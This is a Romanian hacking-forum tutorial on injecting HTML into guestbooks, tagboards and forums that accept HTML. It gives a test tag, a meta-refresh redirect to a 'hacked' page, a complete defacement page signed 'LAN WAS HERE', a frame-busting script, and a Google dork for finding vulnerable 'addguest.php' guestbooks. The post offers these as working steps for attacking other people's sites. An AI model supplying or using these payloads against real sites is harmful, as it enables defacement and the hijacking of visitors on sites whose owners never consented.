HackerIT
Welcome To Paradise !
|
Lista Forumurilor Pe Tematici
|
HackerIT | Reguli | Inregistrare | Login
POZE HACKERIT
Nu sunteti logat.
|
Nou pe simpatie:
dannutzza la Simpatie.ro
 | Femeie
25 ani
Mehedinti
cauta Barbat
25 - 52 ani |
|
-esc-
Administrator
 Inregistrat: acum 16 ani
Postari: 126
|
|
+ Index
+
+--- //.Introducere
+--- //.Unelte
+
+--- //.Procediment
+
+--- //.Note
//.Introducere
Este o tecnica care se bazeaza prin includerea sau injectarea codului
intrun forum tacoard,etc, numai daca esta habilitat optiunea html.
//.Unelte
Numa un simplu cod de proba...
//.Procediment
Cautam un forum,tagboard,carte de vizita.Cel mai probabil
cu o carte de vizita, pentru ca sunt cele mai vulnerabile la "inject html".
Supunem ca esti intro carte de vizita dar cum stim daca
este vulnerabil?... Scriind un simplu cod html in
aria mesajului cum ar fi asta :<font color=red size=6>salut</font>
Cu asta aflam: daca mesajul care l-am scris se pune de cuoare
rosie si apare cat de cat mare inseamna ca e vulnerabil
si stim ca acolo putem face ceva,urmatorul lucru care il vom face
deja cand stim ca e vulnerabil putem face multe lucruri
Cum ar fi:
Sa includem codul urmator:
Code:
<META HTTP-EQUIV="refresh" CONTENT="1; url=www.web.com/hacked.htm"> |
-->Acest cod face sa redirectionam aceasta pagina la alta
Unde: [www.web.com/hacked.htm]
este pagina unde va fi redirectionata sau url unde tu
vei avea indexul tau cu "hacked by x" sau ce o fi...
Dar daca carte te vizita permite sa scriem mult "text" putem
include direct codul nostru de hacked...
Cum ar fi:
Code:
<html>
<head>
<STYLE type=text/css>
BODY {
SCROLLBAR-FACE-COLOR: #000000;
SCROLLBAR-HIGHLIGHT-COLOR: #000000;
SCROLLBAR-SHADOW-COLOR: #000000;
SCROLLBAR-3DLIGHT-COLOR: #000000;
SCROLLBAR-ARROW-COLOR: #ffffff;
SCROLLBAR-TRACK-COLOR: #ffffff;
FONT-FAMILY: Verdana;
SCROLLBAR-DARKSHADOW-COLOR: #000000
</STYLE>
<title>Lan was here :.</title>
</head>
<body alink="#ff0000" bgcolor="#000000" link="#ff0000"
text="#ff0000" vlink="#ff0000">
<div align="center">
<p><font color="#FFFFFF" SIZE=5><STRONG>LAN WAS HERE</STRONG>
</font></p>
<p><img src="img/hacked.jpg" border="0" height="270" width="500">
</p></div>
<p align="center"> <font color="#fe5b2f" face="Haettenschweiler"
size="4"><font color="#005E17" face="Haettenschweiler" size="+2">
Me</font><font color="#FFFFFF" face="Haettenschweiler" size="+2">xi
</font><font color="#FF0000" face="Haettenschweiler" size="+2">co
</font></font></p>
<p align="center"><font color="#fe5b2f" face="Haettenschweiler"
size="4"><font color="#fe5b2f" face="Haettenschweiler" size="4">
<font color="#fe5b2f" face="Haettenschweiler" size="4">
<font color="#999999">Lan[at]gobiernofederal[dot]com<br>
<br>
Www.[b]undeva[/b]/crew.net</font></font></font></font></p>
</body></html> |
Putem pune si aceasta archiva la acest cod Javascript
Code:
<SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT>
<!--
if (top.frames.length!=0)
top.location=self.document.location;
// -->
</SCRIPT> |
Acel JavaScript face ca kacking-ul nostru sa se conectee prima data
//.Notite
Sunt infinite carti de vizita vulnerabile,cum ar fi cartile de vizita cgi,
ca sa le gasesti cauti in google ceva de gen allinurl:"addguest.php"
Aceasta metoda este ceva simplu dar nu te opri aici.
_______________________________________
|
|
| pus acum 16 ani |
|